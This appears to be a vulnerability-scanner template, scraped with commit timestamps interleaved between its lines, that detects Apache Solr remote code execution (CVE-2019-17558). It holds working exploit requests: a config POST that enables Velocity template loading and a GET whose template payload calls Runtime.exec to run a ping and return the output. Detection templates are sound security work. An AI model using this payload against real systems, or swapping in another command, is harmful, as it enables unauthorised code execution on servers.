2021-01-02 04:59:06 +00:00
id : CVE-2019-17558
2020-09-03 16:13:34 +00:00
info :
name : Apache Solr 8.3.0 - Remote Code Execution via Velocity Template
2021-04-08 10:00:03 +00:00
author : pikpikcu & madrobot
2020-09-03 16:13:34 +00:00
severity : critical
2021-02-05 19:44:41 +00:00
refrense : https://nvd.nist.gov/vuln/detail/CVE-2019-17558
tags : cve,cve2019,apache,rce
2020-09-03 16:13:34 +00:00
requests :
2021-04-08 09:44:25 +00:00
- raw :
2020-09-03 17:14:42 +00:00
- |
2021-04-08 09:44:25 +00:00
GET /solr/admin/cores?wt=json HTTP/1.1
Host : {{Hostname}}
Accept-Language : en
Connection : close
2021-04-08 10:00:03 +00:00
2021-04-08 09:44:25 +00:00
- |
POST /solr/§token§/config HTTP/1.1
2020-09-03 17:14:42 +00:00
Host : {{Hostname}}
User-Agent : Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language : en-US,en;q=0.5
Connection : close
Content-Type : application/json
Content-Length : 259
Upgrade-Insecure-Requests : 1
2020-09-03 16:13:34 +00:00
2020-09-03 17:14:42 +00:00
{
"update-queryresponsewriter": {
"startup": "lazy" ,
"name": "velocity" ,
"class": "solr.VelocityResponseWriter" ,
"template.base.dir": "" ,
"solr.resource.loader.enabled": "true" ,
"params.resource.loader.enabled": "true"
}
2020-09-03 16:13:34 +00:00
}
2021-04-08 10:00:03 +00:00
2020-09-03 17:14:42 +00:00
- |
2021-04-08 09:46:32 +00:00
GET /solr/§token§/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping%20example.com%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
2020-09-03 17:14:42 +00:00
Host : {{Hostname}}
User-Agent : Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language : en-US,en;q=0.5
Connection : close
Upgrade-Insecure-Requests : 1
2021-04-08 10:00:03 +00:00
2021-04-08 09:44:25 +00:00
extractors :
2020-09-03 16:13:34 +00:00
- type : regex
part : body
2021-04-08 09:44:25 +00:00
internal : true
name : token
group : 1
regex :
- "\"name\":\"(.*)\""
matchers :
- type : word
words :
2021-04-08 10:00:03 +00:00
- "Pinging example.com" # Windows
- "PING example.com" # Linux
2021-04-08 09:44:25 +00:00
condition : or